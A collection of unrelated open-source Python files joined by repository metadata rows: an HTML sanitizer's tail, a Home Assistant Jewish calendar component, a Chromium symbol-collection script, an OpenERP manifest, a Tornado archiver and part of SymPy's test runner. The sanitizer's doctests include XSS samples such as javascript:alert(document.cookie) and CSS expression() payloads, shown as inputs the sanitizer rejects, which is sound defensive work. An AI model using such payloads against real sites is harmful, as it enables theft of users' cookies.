if propname.startswith('margin') and '-' in value:
# Negative margins can be used for phishing
return False
return True
def is_safe_elem(self, tag, attrs):
"""Determine whether the given element should be considered safe for
inclusion in the output.
:param tag: the tag name of the element
:type tag: QName
:param attrs: the element attributes
:type attrs: Attrs
:return: whether the element should be considered safe
:rtype: bool
:since: version 0.6
"""
if tag not in self.safe_tags:
return False
if tag.localname == 'input':
input_type = attrs.get('type', '').lower()
if input_type == 'password':
return False
return True
def is_safe_uri(self, uri):
"""Determine whether the given URI is to be considered safe for
inclusion in the output.
The default implementation checks whether the scheme of the URI is in
the set of allowed URIs (`safe_schemes`).
>>> sanitizer = HTMLSanitizer()
>>> sanitizer.is_safe_uri('http://example.org/')
True
>>> sanitizer.is_safe_uri('javascript:alert(document.cookie)')
False
:param uri: the URI to check
:return: `True` if the URI can be considered safe, `False` otherwise
:rtype: `bool`
:since: version 0.4.3
"""
if '#' in uri:
uri = uri.split('#', 1)[0] # Strip out the fragment identifier
if ':' not in uri:
return True # This is a relative URI
chars = [char for char in uri.split(':', 1)[0] if char.isalnum()]
return ''.join(chars).lower() in self.safe_schemes
def sanitize_css(self, text):
"""Remove potentially dangerous property declarations from CSS code.
In particular, properties using the CSS ``url()`` function with a scheme
that is not considered safe are removed:
>>> sanitizer = HTMLSanitizer()
>>> sanitizer.sanitize_css(u'''
... background: url(javascript:alert("foo"));
... color: #000;
... ''')
[u'color: #000']
Also, the proprietary Internet Explorer function ``expression()`` is
always stripped:
>>> sanitizer.sanitize_css(u'''
... background: #fff;
... color: #000;
... width: e/**/xpression(alert("foo"));
... ''')
[u'background: #fff', u'color: #000']
:param text: the CSS text; this is expected to be `unicode` and to not
contain any character or numeric references
:return: a list of declarations that are considered safe
:rtype: `list`
:since: version 0.4.3
"""
decls = []
text = self._strip_css_comments(self._replace_unicode_escapes(text))
for decl in text.split(';'):
decl = decl.strip()
if not decl:
continue
try:
propname, value = decl.split(':', 1)
except ValueError:
continue
if not self.is_safe_css(propname.strip().lower(), value.strip()):
continue
is_evil = False
if self._EXPRESSION_SEARCH(value):
is_evil = True
for match in self._URL_FINDITER(value):
if not self.is_safe_uri(match.group(1)):
is_evil = True
break
if not is_evil:
decls.append(decl.strip())
return decls
_NORMALIZE_NEWLINES = re.compile(r'\r\n').sub
_UNICODE_ESCAPE = re.compile(
r"""\\([0-9a-fA-F]{1,6})\s?|\\([^\r\n\f0-9a-fA-F'"{};:()#*])""",
re.UNICODE).sub
def _replace_unicode_escapes(self, text):
def _repl(match):
t = match.group(1)
if t:
return unichr(int(t, 16))
t = match.group(2)
if t == '\\':
return r'\\'
else:
return t
return self._UNICODE_ESCAPE(_repl, self._NORMALIZE_NEWLINES('\n', text))
_CSS_COMMENTS = re.compile(r'/\*.*?\*/').sub
def _strip_css_comments(self, text):
return self._CSS_COMMENTS('', text)
| gpl-2.0 | 130,162,049,564,573,860 | 41.060886 | 106 | 0.512787 | false |
pschmitt/home-assistant | homeassistant/components/jewish_calendar/__init__.py | 7 | 4146 | """The jewish_calendar component."""
import logging
import hdate
import voluptuous as vol
from homeassistant.const import CONF_LATITUDE, CONF_LONGITUDE, CONF_NAME
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.discovery import async_load_platform
_LOGGER = logging.getLogger(__name__)
DOMAIN = "jewish_calendar"
SENSOR_TYPES = {
"binary": {
"issur_melacha_in_effect": ["Issur Melacha in Effect", "mdi:power-plug-off"]
},
"data": {
"date": ["Date", "mdi:judaism"],
"weekly_portion": ["Parshat Hashavua", "mdi:book-open-variant"],
"holiday": ["Holiday", "mdi:calendar-star"],
"omer_count": ["Day of the Omer", "mdi:counter"],
"daf_yomi": ["Daf Yomi", "mdi:book-open-variant"],
    },
    "time": {
        "first_light": ["Alot Hashachar", "mdi:weather-sunset-up"],
        "talit": ["Talit and Tefillin", "mdi:calendar-clock"],
        "gra_end_shma": ['Latest time for Shma Gr"a', "mdi:calendar-clock"],
        "mga_end_shma": ['Latest time for Shma MG"A', "mdi:calendar-clock"],
        "gra_end_tfila": ['Latest time for Tefilla Gr"a', "mdi:calendar-clock"],
        "mga_end_tfila": ['Latest time for Tefilla MG"A', "mdi:calendar-clock"],
"big_mincha": ["Mincha Gedola", "mdi:calendar-clock"],
"small_mincha": ["Mincha Ketana", "mdi:calendar-clock"],
"plag_mincha": ["Plag Hamincha", "mdi:weather-sunset-down"],
"sunset": ["Shkia", "mdi:weather-sunset"],
"first_stars": ["T'set Hakochavim", "mdi:weather-night"],
"upcoming_shabbat_candle_lighting": [
"Upcoming Shabbat Candle Lighting",
"mdi:candle",
],
"upcoming_shabbat_havdalah": ["Upcoming Shabbat Havdalah", "mdi:weather-night"],
"upcoming_candle_lighting": ["Upcoming Candle Lighting", "mdi:candle"],
"upcoming_havdalah": ["Upcoming Havdalah", "mdi:weather-night"],
},
}
CONF_DIASPORA = "diaspora"
CONF_LANGUAGE = "language"
CONF_CANDLE_LIGHT_MINUTES = "candle_lighting_minutes_before_sunset"
CONF_HAVDALAH_OFFSET_MINUTES = "havdalah_minutes_after_sunset"
CANDLE_LIGHT_DEFAULT = 18
DEFAULT_NAME = "Jewish Calendar"
CONFIG_SCHEMA = vol.Schema(
{
DOMAIN: vol.Schema(
{
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(CONF_DIASPORA, default=False): cv.boolean,
vol.Inclusive(CONF_LATITUDE, "coordinates"): cv.latitude,
vol.Inclusive(CONF_LONGITUDE, "coordinates"): cv.longitude,
vol.Optional(CONF_LANGUAGE, default="english"): vol.In(
["hebrew", "english"]
),
vol.Optional(
CONF_CANDLE_LIGHT_MINUTES, default=CANDLE_LIGHT_DEFAULT
): int,
# Default of 0 means use 8.5 degrees / 'three_stars' time.
vol.Optional(CONF_HAVDALAH_OFFSET_MINUTES, default=0): int,
}
)
},
extra=vol.ALLOW_EXTRA,
)
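# Example configuration.yaml entry (illustrative values only):
#
#   jewish_calendar:
#     language: hebrew
#     diaspora: true
#     candle_lighting_minutes_before_sunset: 40
#     havdalah_minutes_after_sunset: 42
#
# Latitude and longitude default to the Home Assistant instance's own
# coordinates when omitted (see async_setup below).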
async def async_setup(hass, config):
"""Set up the Jewish Calendar component."""
name = config[DOMAIN][CONF_NAME]
language = config[DOMAIN][CONF_LANGUAGE]
latitude = config[DOMAIN].get(CONF_LATITUDE, hass.config.latitude)
longitude = config[DOMAIN].get(CONF_LONGITUDE, hass.config.longitude)
diaspora = config[DOMAIN][CONF_DIASPORA]
candle_lighting_offset = config[DOMAIN][CONF_CANDLE_LIGHT_MINUTES]
havdalah_offset = config[DOMAIN][CONF_HAVDALAH_OFFSET_MINUTES]
location = hdate.Location(
latitude=latitude,
longitude=longitude,
timezone=hass.config.time_zone,
diaspora=diaspora,
)
hass.data[DOMAIN] = {
"location": location,
"name": name,
"language": language,
"candle_lighting_offset": candle_lighting_offset,
"havdalah_offset": havdalah_offset,
"diaspora": diaspora,
}
hass.async_create_task(async_load_platform(hass, "sensor", DOMAIN, {}, config))
hass.async_create_task(
async_load_platform(hass, "binary_sensor", DOMAIN, {}, config)
)
return True
| apache-2.0 | -5,895,185,876,142,505,000 | 35.368421 | 88 | 0.616498 | false |
imply/chuu | tools/find_runtime_symbols/prepare_symbol_info.py | 24 | 8217 | #!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import hashlib
import json
import logging
import os
import re
import shutil
import subprocess
import sys
import tempfile
from proc_maps import ProcMaps
BASE_PATH = os.path.dirname(os.path.abspath(__file__))
REDUCE_DEBUGLINE_PATH = os.path.join(BASE_PATH, 'reduce_debugline.py')
LOGGER = logging.getLogger('prepare_symbol_info')
def _dump_command_result(command, output_dir_path, basename, suffix):
handle_out, filename_out = tempfile.mkstemp(
suffix=suffix, prefix=basename + '.', dir=output_dir_path)
handle_err, filename_err = tempfile.mkstemp(
suffix=suffix + '.err', prefix=basename + '.', dir=output_dir_path)
error = False
try:
subprocess.check_call(
command, stdout=handle_out, stderr=handle_err, shell=True)
except (OSError, subprocess.CalledProcessError):
error = True
finally:
os.close(handle_err)
os.close(handle_out)
if os.path.exists(filename_err):
if LOGGER.getEffectiveLevel() <= logging.DEBUG:
with open(filename_err, 'r') as f:
for line in f:
LOGGER.debug(line.rstrip())
os.remove(filename_err)
if os.path.exists(filename_out) and (
os.path.getsize(filename_out) == 0 or error):
os.remove(filename_out)
return None
if not os.path.exists(filename_out):
return None
return filename_out
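# _dump_command_result (above) runs a shell pipeline and captures its stdout
# into a temporary file alongside the other collected data; failed or empty
# runs are cleaned up and reported as None so callers can simply skip that
# binary.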
def prepare_symbol_info(maps_path,
output_dir_path=None,
alternative_dirs=None,
use_tempdir=False,
use_source_file_name=False):
"""Prepares (collects) symbol information files for find_runtime_symbols.
1) If |output_dir_path| is specified, it tries collecting symbol information
files in the given directory |output_dir_path|.
1-a) If |output_dir_path| doesn't exist, create the directory and use it.
1-b) If |output_dir_path| is an empty directory, use it.
  1-c) If |output_dir_path| is a directory which has 'files.json', assumes that
       files are already collected and reuses them without re-collecting.
1-d) Otherwise, depends on |use_tempdir|.
2) If |output_dir_path| is not specified, it tries to create a new directory
depending on 'maps_path'.
If it cannot create a new directory, creates a temporary directory depending
on |use_tempdir|. If |use_tempdir| is False, returns None.
Args:
    maps_path: A path to a file which contains '/proc/<pid>/maps'.
    output_dir_path: A path to a directory where files are prepared.
    alternative_dirs: A mapping from a directory '/path/on/target' where the
        target process runs to a directory '/path/on/host' where the script
        reads the binary. Considered to be used for Android binaries.
use_tempdir: If True, it creates a temporary directory when it cannot
create a new directory.
use_source_file_name: If True, it adds reduced result of 'readelf -wL'
to find source file names.
Returns:
A pair of a path to the prepared directory and a boolean representing
if it created a temporary directory or not.
"""
alternative_dirs = alternative_dirs or {}
if not output_dir_path:
matched = re.match('^(.*)\.maps$', os.path.basename(maps_path))
if matched:
output_dir_path = matched.group(1) + '.pre'
if not output_dir_path:
matched = re.match('^/proc/(.*)/maps$', os.path.realpath(maps_path))
if matched:
output_dir_path = matched.group(1) + '.pre'
if not output_dir_path:
output_dir_path = os.path.basename(maps_path) + '.pre'
# TODO(dmikurube): Find another candidate for output_dir_path.
used_tempdir = False
LOGGER.info('Data for profiling will be collected in "%s".' % output_dir_path)
if os.path.exists(output_dir_path):
if os.path.isdir(output_dir_path) and not os.listdir(output_dir_path):
LOGGER.warn('Using an empty existing directory "%s".' % output_dir_path)
else:
LOGGER.warn('A file or a directory exists at "%s".' % output_dir_path)
if os.path.exists(os.path.join(output_dir_path, 'files.json')):
LOGGER.warn('Using the existing directory "%s".' % output_dir_path)
return output_dir_path, used_tempdir
else:
if use_tempdir:
output_dir_path = tempfile.mkdtemp()
used_tempdir = True
LOGGER.warn('Using a temporary directory "%s".' % output_dir_path)
else:
LOGGER.warn('The directory "%s" is not available.' % output_dir_path)
return None, used_tempdir
else:
LOGGER.info('Creating a new directory "%s".' % output_dir_path)
try:
os.mkdir(output_dir_path)
except OSError:
LOGGER.warn('A directory "%s" cannot be created.' % output_dir_path)
if use_tempdir:
output_dir_path = tempfile.mkdtemp()
used_tempdir = True
LOGGER.warn('Using a temporary directory "%s".' % output_dir_path)
else:
LOGGER.warn('The directory "%s" is not available.' % output_dir_path)
return None, used_tempdir
shutil.copyfile(maps_path, os.path.join(output_dir_path, 'maps'))
with open(maps_path, mode='r') as f:
maps = ProcMaps.load(f)
LOGGER.debug('Listing up symbols.')
files = {}
for entry in maps.iter(ProcMaps.executable):
LOGGER.debug(' %016x-%016x +%06x %s' % (
entry.begin, entry.end, entry.offset, entry.name))
binary_path = entry.name
for target_path, host_path in alternative_dirs.iteritems():
if entry.name.startswith(target_path):
binary_path = entry.name.replace(target_path, host_path, 1)
nm_filename = _dump_command_result(
'nm -n --format bsd %s | c++filt' % binary_path,
output_dir_path, os.path.basename(binary_path), '.nm')
if not nm_filename:
continue
readelf_e_filename = _dump_command_result(
'readelf -eW %s' % binary_path,
output_dir_path, os.path.basename(binary_path), '.readelf-e')
if not readelf_e_filename:
continue
readelf_debug_decodedline_file = None
if use_source_file_name:
readelf_debug_decodedline_file = _dump_command_result(
'readelf -wL %s | %s' % (binary_path, REDUCE_DEBUGLINE_PATH),
output_dir_path, os.path.basename(binary_path), '.readelf-wL')
files[entry.name] = {}
files[entry.name]['nm'] = {
'file': os.path.basename(nm_filename),
'format': 'bsd',
'mangled': False}
files[entry.name]['readelf-e'] = {
'file': os.path.basename(readelf_e_filename)}
if readelf_debug_decodedline_file:
files[entry.name]['readelf-debug-decodedline-file'] = {
'file': os.path.basename(readelf_debug_decodedline_file)}
files[entry.name]['size'] = os.stat(binary_path).st_size
with open(binary_path, 'rb') as entry_f:
md5 = hashlib.md5()
sha1 = hashlib.sha1()
chunk = entry_f.read(1024 * 1024)
while chunk:
md5.update(chunk)
sha1.update(chunk)
chunk = entry_f.read(1024 * 1024)
files[entry.name]['sha1'] = sha1.hexdigest()
files[entry.name]['md5'] = md5.hexdigest()
with open(os.path.join(output_dir_path, 'files.json'), 'w') as f:
json.dump(files, f, indent=2, sort_keys=True)
LOGGER.info('Collected symbol information at "%s".' % output_dir_path)
return output_dir_path, used_tempdir
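# Illustrative sketch, not part of the original module: a minimal example of
# how prepare_symbol_info() might be invoked programmatically. The maps path
# and output directory below are hypothetical placeholders.
def _example_prepare_symbol_info():
  prepared_dir, used_tempdir = prepare_symbol_info(
      '/tmp/12345.maps',                  # hypothetical '/proc/<pid>/maps' dump
      output_dir_path='/tmp/12345.pre',
      use_tempdir=True,                   # fall back to a temporary directory
      use_source_file_name=False)
  if prepared_dir:
    LOGGER.info('Symbols prepared in "%s" (tempdir=%s).' %
                (prepared_dir, used_tempdir))
  return prepared_dir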
def main():
if not sys.platform.startswith('linux'):
    sys.stderr.write('This script works only on Linux.')
return 1
LOGGER.setLevel(logging.DEBUG)
handler = logging.StreamHandler()
handler.setLevel(logging.INFO)
formatter = logging.Formatter('%(message)s')
handler.setFormatter(formatter)
LOGGER.addHandler(handler)
# TODO(dmikurube): Specify |alternative_dirs| from command line.
if len(sys.argv) < 2:
sys.stderr.write("""Usage:
%s /path/to/maps [/path/to/output_data_dir/]
""" % sys.argv[0])
return 1
elif len(sys.argv) == 2:
result, _ = prepare_symbol_info(sys.argv[1])
else:
result, _ = prepare_symbol_info(sys.argv[1], sys.argv[2])
return not result
if __name__ == '__main__':
sys.exit(main())
| bsd-3-clause | 9,000,435,807,857,038,000 | 35.358407 | 80 | 0.653888 | false |
hbrunn/OpenUpgrade | addons/l10n_syscohada/__openerp__.py | 430 | 1940 | # -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2010-2011 BAAMTU SARL (<http://www.baamtu.sn>).
# contact: [email protected]
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name' : 'OHADA - Accounting',
'version' : '1.0',
'author' : 'Baamtu Senegal',
'category' : 'Localization/Account Charts',
'description': """
This module implements the accounting chart for OHADA area.
===========================================================
It allows any company or association to manage its financial accounting.
Countries that use OHADA are the following:
-------------------------------------------
Benin, Burkina Faso, Cameroon, Central African Republic, Comoros, Congo,
Ivory Coast, Gabon, Guinea, Guinea Bissau, Equatorial Guinea, Mali, Niger,
Replica of Democratic Congo, Senegal, Chad, Togo.
""",
'website': 'http://www.baamtu.com',
'depends' : ['account', 'base_vat'],
'demo' : [],
'data' : ['l10n_syscohada_data.xml','l10n_syscohada_wizard.xml'],
'auto_install': False,
'installable': True
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | -6,111,508,458,695,258,000 | 39.416667 | 78 | 0.593299 | false |
alipsgh/tornado | archiver/archiver.py | 1 | 1542 | """
The Tornado Framework
By Ali Pesaranghader
University of Ottawa, Ontario, Canada
E-mail: apesaran -at- uottawa -dot- ca / alipsgh -at- gmail -dot- com
"""
import os
import zipfile
from os.path import basename
class Archiver:
"""
This class stores results of experiments in .zip files for future reference!
"""
@staticmethod
def archive_single(label, stats, dir_path, name, sub_name):
file_path = (dir_path + name + "_" + sub_name).lower()
stats_writer = open(file_path + ".txt", 'w')
stats_writer.write(label + "\n")
stats_writer.write(str(stats) + "\n")
stats_writer.close()
zipper = zipfile.ZipFile(file_path + ".zip", 'w')
zipper.write(file_path + ".txt", compress_type=zipfile.ZIP_DEFLATED, arcname=basename(file_path + ".txt"))
zipper.close()
os.remove(file_path + ".txt")
@staticmethod
def archive_multiple(labels, stats, dir_path, name, sub_name):
file_path = (dir_path + name + "_" + sub_name).lower()
stats_writer = open(file_path + ".txt", 'w')
for i in range(0, len(labels)):
stats_writer.write(labels[i] + "\n")
stats_writer.write(str(stats[i]) + "\n")
stats_writer.close()
zipper = zipfile.ZipFile(file_path + ".zip", 'w')
zipper.write(file_path + ".txt", compress_type=zipfile.ZIP_DEFLATED, arcname=basename(file_path + ".txt"))
zipper.close()
os.remove(file_path + ".txt")
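# Illustrative usage sketch, not part of the original module. The labels,
# statistics, and paths below are hypothetical placeholders; the target
# directory is assumed to exist.
def _example_archiver_usage():
    Archiver.archive_single(label="error-rate",
                            stats=[0.12, 0.10, 0.09],
                            dir_path="results/",
                            name="stream_experiment",
                            sub_name="run_1")
    Archiver.archive_multiple(labels=["error-rate", "runtime"],
                              stats=[[0.12, 0.10], [3.4, 3.1]],
                              dir_path="results/",
                              name="stream_experiment",
                              sub_name="all_runs")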
| mit | 1,227,065,012,097,761,300 | 29.469388 | 114 | 0.581712 | false |
devs1991/test_edx_docmode | venv/lib/python2.7/site-packages/sympy/utilities/runtests.py | 3 | 46156 | """
This is our testing framework.
Goals:
* it should be compatible with py.test and operate very similarly (or
identically)
* doesn't require any external dependencies
* preferably all the functionality should be in this file only
* no magic, just import the test file and execute the test functions, that's it
* portable
"""
import os
import sys
import inspect
import traceback
import pdb
import re
import linecache
from fnmatch import fnmatch
from timeit import default_timer as clock
import doctest as pdoctest # avoid clashing with our doctest() function
from doctest import DocTestFinder, DocTestRunner
import re as pre
import random
# Use sys.stdout encoding for output.
# This was only added to Python's doctest in Python 2.6, so we must duplicate
# it here to make utf8 files work in Python 2.5.
pdoctest._encoding = getattr(sys.__stdout__, 'encoding', None) or 'utf-8'
def _indent(s, indent=4):
"""
Add the given number of space characters to the beginning of
every non-blank line in `s`, and return the result.
If the string `s` is Unicode, it is encoded using the stdout
encoding and the `backslashreplace` error handler.
"""
if isinstance(s, unicode):
s = s.encode(pdoctest._encoding, 'backslashreplace')
# This regexp matches the start of non-blank lines:
return re.sub('(?m)^(?!$)', indent*' ', s)
pdoctest._indent = _indent
def sys_normcase(f):
if sys_case_insensitive:
return f.lower()
return f
def convert_to_native_paths(lst):
"""
Converts a list of '/' separated paths into a list of
native (os.sep separated) paths and converts to lowercase
if the system is case insensitive.
"""
newlst = []
for i, rv in enumerate(lst):
rv = os.path.join(*rv.split("/"))
# on windows the slash after the colon is dropped
if sys.platform == "win32":
pos = rv.find(':')
if pos != -1:
if rv[pos+1] != '\\':
rv = rv[:pos+1] + '\\' + rv[pos+1:]
newlst.append(sys_normcase(rv))
return newlst
def get_sympy_dir():
"""
Returns the root sympy directory and set the global value
indicating whether the system is case sensitive or not.
"""
global sys_case_insensitive
this_file = os.path.abspath(__file__)
sympy_dir = os.path.join(os.path.dirname(this_file), "..", "..")
sympy_dir = os.path.normpath(sympy_dir)
sys_case_insensitive = (os.path.isdir(sympy_dir) and
os.path.isdir(sympy_dir.lower()) and
os.path.isdir(sympy_dir.upper()))
return sys_normcase(sympy_dir)
def isgeneratorfunction(object):
"""
Return true if the object is a user-defined generator function.
    Generator function objects provide the same attributes as functions.
See isfunction.__doc__ for attributes listing.
Adapted from Python 2.6.
"""
CO_GENERATOR = 0x20
if (inspect.isfunction(object) or inspect.ismethod(object)) and \
object.func_code.co_flags & CO_GENERATOR:
return True
return False
def setup_pprint():
from sympy import pprint_use_unicode, init_printing
# force pprint to be in ascii mode in doctests
pprint_use_unicode(False)
# hook our nice, hash-stable strprinter
init_printing(pretty_print=False)
def test(*paths, **kwargs):
"""
Run all tests in test_*.py files which match any of the given
strings in `paths` or all tests if paths=[].
Notes:
o if sort=False, tests are run in random order (not default).
o paths can be entered in native system format or in unix,
forward-slash format.
Examples:
>> import sympy
Run all tests:
>> sympy.test()
Run one file:
>> sympy.test("sympy/core/tests/test_basic.py")
>> sympy.test("_basic")
Run all tests in sympy/functions/ and some particular file:
>> sympy.test("sympy/core/tests/test_basic.py", "sympy/functions")
Run all tests in sympy/core and sympy/utilities:
>> sympy.test("/core", "/util")
Run specific test from a file:
>> sympy.test("sympy/core/tests/test_basic.py", kw="test_equality")
Run the tests with verbose mode on:
>> sympy.test(verbose=True)
Don't sort the test output:
>> sympy.test(sort=False)
Turn on post-mortem pdb:
>> sympy.test(pdb=True)
Turn off colors:
>> sympy.test(colors=False)
The traceback verboseness can be set to "short" or "no" (default is "short")
>> sympy.test(tb='no')
"""
verbose = kwargs.get("verbose", False)
tb = kwargs.get("tb", "short")
kw = kwargs.get("kw", "")
post_mortem = kwargs.get("pdb", False)
colors = kwargs.get("colors", True)
sort = kwargs.get("sort", True)
seed = kwargs.get("seed", None)
if seed is None:
seed = random.randrange(100000000)
r = PyTestReporter(verbose, tb, colors)
t = SymPyTests(r, kw, post_mortem, seed)
# Disable warnings for external modules
import sympy.external
sympy.external.importtools.WARN_OLD_VERSION = False
sympy.external.importtools.WARN_NOT_INSTALLED = False
test_files = t.get_test_files('sympy')
if len(paths) == 0:
t._testfiles.extend(test_files)
else:
paths = convert_to_native_paths(paths)
matched = []
for f in test_files:
basename = os.path.basename(f)
for p in paths:
if p in f or fnmatch(basename, p):
matched.append(f)
break
t._testfiles.extend(matched)
return t.test(sort=sort)
def doctest(*paths, **kwargs):
"""
Runs doctests in all *py files in the sympy directory which match
any of the given strings in `paths` or all tests if paths=[].
Note:
o paths can be entered in native system format or in unix,
forward-slash format.
o files that are on the blacklist can be tested by providing
their path; they are only excluded if no paths are given.
Examples:
>> import sympy
Run all tests:
>> sympy.doctest()
Run one file:
>> sympy.doctest("sympy/core/basic.py")
>> sympy.doctest("polynomial.txt")
Run all tests in sympy/functions/ and some particular file:
>> sympy.doctest("/functions", "basic.py")
Run any file having polynomial in its name, doc/src/modules/polynomial.txt,
sympy\functions\special\polynomials.py, and sympy\polys\polynomial.py:
>> sympy.doctest("polynomial")
"""
normal = kwargs.get("normal", False)
verbose = kwargs.get("verbose", False)
blacklist = kwargs.get("blacklist", [])
blacklist.extend([
"doc/src/modules/mpmath", # needs to be fixed upstream
"sympy/mpmath", # needs to be fixed upstream
"doc/src/modules/plotting.txt", # generates live plots
"sympy/plotting", # generates live plots
"sympy/utilities/compilef.py", # needs tcc
"sympy/utilities/autowrap.py", # needs installed compiler
"sympy/galgebra/GA.py", # needs numpy
"sympy/galgebra/latex_ex.py", # needs numpy
"sympy/conftest.py", # needs py.test
"sympy/utilities/benchmarking.py", # needs py.test
])
blacklist = convert_to_native_paths(blacklist)
# Disable warnings for external modules
import sympy.external
sympy.external.importtools.WARN_OLD_VERSION = False
sympy.external.importtools.WARN_NOT_INSTALLED = False
r = PyTestReporter(verbose)
t = SymPyDocTests(r, normal)
test_files = t.get_test_files('sympy')
not_blacklisted = [f for f in test_files
if not any(b in f for b in blacklist)]
if len(paths) == 0:
t._testfiles.extend(not_blacklisted)
else:
# take only what was requested...but not blacklisted items
# and allow for partial match anywhere or fnmatch of name
paths = convert_to_native_paths(paths)
matched = []
for f in not_blacklisted:
basename = os.path.basename(f)
for p in paths:
if p in f or fnmatch(basename, p):
matched.append(f)
break
t._testfiles.extend(matched)
# run the tests and record the result for this *py portion of the tests
if t._testfiles:
failed = not t.test()
else:
failed = False
# test *txt files only if we are running python newer than 2.4
if sys.version_info[:2] > (2,4):
# N.B.
# --------------------------------------------------------------------
# Here we test *.txt files at or below doc/src. Code from these must
# be self supporting in terms of imports since there is no importing
# of necessary modules by doctest.testfile. If you try to pass *.py
# files through this they might fail because they will lack the needed
# imports and smarter parsing that can be done with source code.
#
test_files = t.get_test_files('doc/src', '*.txt', init_only=False)
test_files.sort()
not_blacklisted = [f for f in test_files
if not any(b in f for b in blacklist)]
if len(paths) == 0:
matched = not_blacklisted
else:
# Take only what was requested as long as it's not on the blacklist.
# Paths were already made native in *py tests so don't repeat here.
# There's no chance of having a *py file slip through since we
# only have *txt files in test_files.
matched = []
for f in not_blacklisted:
basename = os.path.basename(f)
for p in paths:
if p in f or fnmatch(basename, p):
matched.append(f)
break
setup_pprint()
first_report = True
for txt_file in matched:
if not os.path.isfile(txt_file):
continue
old_displayhook = sys.displayhook
try:
# out = pdoctest.testfile(txt_file, module_relative=False, encoding='utf-8',
# optionflags=pdoctest.ELLIPSIS | pdoctest.NORMALIZE_WHITESPACE)
out = sympytestfile(txt_file, module_relative=False, encoding='utf-8',
optionflags=pdoctest.ELLIPSIS | pdoctest.NORMALIZE_WHITESPACE)
finally:
# make sure we return to the original displayhook in case some
# doctest has changed that
sys.displayhook = old_displayhook
txtfailed, tested = out
if tested:
failed = txtfailed or failed
if first_report:
first_report = False
msg = 'txt doctests start'
lhead = '='*((80 - len(msg))//2 - 1)
rhead = '='*(79 - len(msg) - len(lhead) - 1)
print ' '.join([lhead, msg, rhead])
print
# use as the id, everything past the first 'sympy'
file_id = txt_file[txt_file.find('sympy') + len('sympy') + 1:]
                print file_id, # get at least the name out so it is known who is being tested
wid = 80 - len(file_id) - 1 #update width
test_file = '[%s]' % (tested)
report = '[%s]' % (txtfailed or 'OK')
print ''.join([test_file,' '*(wid-len(test_file)-len(report)), report])
# the doctests for *py will have printed this message already if there was
# a failure, so now only print it if there was intervening reporting by
# testing the *txt as evidenced by first_report no longer being True.
if not first_report and failed:
print
print("DO *NOT* COMMIT!")
return not failed
# The Python 2.5 doctest runner uses a tuple, but in 2.6+, it uses a namedtuple
# (which doesn't exist in 2.5-)
if sys.version_info[:2] > (2,5):
from collections import namedtuple
SymPyTestResults = namedtuple('TestResults', 'failed attempted')
else:
SymPyTestResults = lambda a, b: (a, b)
def sympytestfile(filename, module_relative=True, name=None, package=None,
globs=None, verbose=None, report=True, optionflags=0,
extraglobs=None, raise_on_error=False,
parser=pdoctest.DocTestParser(), encoding=None):
"""
Test examples in the given file. Return (#failures, #tests).
Optional keyword arg "module_relative" specifies how filenames
should be interpreted:
- If "module_relative" is True (the default), then "filename"
specifies a module-relative path. By default, this path is
relative to the calling module's directory; but if the
"package" argument is specified, then it is relative to that
package. To ensure os-independence, "filename" should use
"/" characters to separate path segments, and should not
be an absolute path (i.e., it may not begin with "/").
- If "module_relative" is False, then "filename" specifies an
os-specific path. The path may be absolute or relative (to
the current working directory).
Optional keyword arg "name" gives the name of the test; by default
use the file's basename.
Optional keyword argument "package" is a Python package or the
name of a Python package whose directory should be used as the
base directory for a module relative filename. If no package is
specified, then the calling module's directory is used as the base
directory for module relative filenames. It is an error to
specify "package" if "module_relative" is False.
Optional keyword arg "globs" gives a dict to be used as the globals
when executing examples; by default, use {}. A copy of this dict
is actually used for each docstring, so that each docstring's
examples start with a clean slate.
Optional keyword arg "extraglobs" gives a dictionary that should be
merged into the globals that are used to execute examples. By
default, no extra globals are used.
Optional keyword arg "verbose" prints lots of stuff if true, prints
only failures if false; by default, it's true iff "-v" is in sys.argv.
Optional keyword arg "report" prints a summary at the end when true,
else prints nothing at the end. In verbose mode, the summary is
detailed, else very brief (in fact, empty if all tests passed).
Optional keyword arg "optionflags" or's together module constants,
and defaults to 0. Possible values (see the docs for details):
DONT_ACCEPT_TRUE_FOR_1
DONT_ACCEPT_BLANKLINE
NORMALIZE_WHITESPACE
ELLIPSIS
SKIP
IGNORE_EXCEPTION_DETAIL
REPORT_UDIFF
REPORT_CDIFF
REPORT_NDIFF
REPORT_ONLY_FIRST_FAILURE
Optional keyword arg "raise_on_error" raises an exception on the
first unexpected exception or failure. This allows failures to be
post-mortem debugged.
Optional keyword arg "parser" specifies a DocTestParser (or
subclass) that should be used to extract tests from the files.
Optional keyword arg "encoding" specifies an encoding that should
be used to convert the file to unicode.
Advanced tomfoolery: testmod runs methods of a local instance of
class doctest.Tester, then merges the results into (or creates)
global Tester instance doctest.master. Methods of doctest.master
can be called directly too, if you want to do something unusual.
Passing report=0 to testmod is especially useful then, to delay
displaying a summary. Invoke doctest.master.summarize(verbose)
when you're done fiddling.
"""
if package and not module_relative:
raise ValueError("Package may only be specified for module-"
"relative paths.")
# Relativize the path
text, filename = pdoctest._load_testfile(filename, package, module_relative)
# If no name was given, then use the file's name.
if name is None:
name = os.path.basename(filename)
# Assemble the globals.
if globs is None:
globs = {}
else:
globs = globs.copy()
if extraglobs is not None:
globs.update(extraglobs)
if '__name__' not in globs:
globs['__name__'] = '__main__'
if raise_on_error:
runner = pdoctest.DebugRunner(verbose=verbose, optionflags=optionflags)
else:
runner = SymPyDocTestRunner(verbose=verbose, optionflags=optionflags)
if encoding is not None:
text = text.decode(encoding)
# Read the file, convert it to a test, and run it.
test = parser.get_doctest(text, globs, name, filename, 0)
runner.run(test)
if report:
runner.summarize()
if pdoctest.master is None:
pdoctest.master = runner
else:
pdoctest.master.merge(runner)
return SymPyTestResults(runner.failures, runner.tries)
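# Illustrative sketch, not part of the original module: how sympytestfile()
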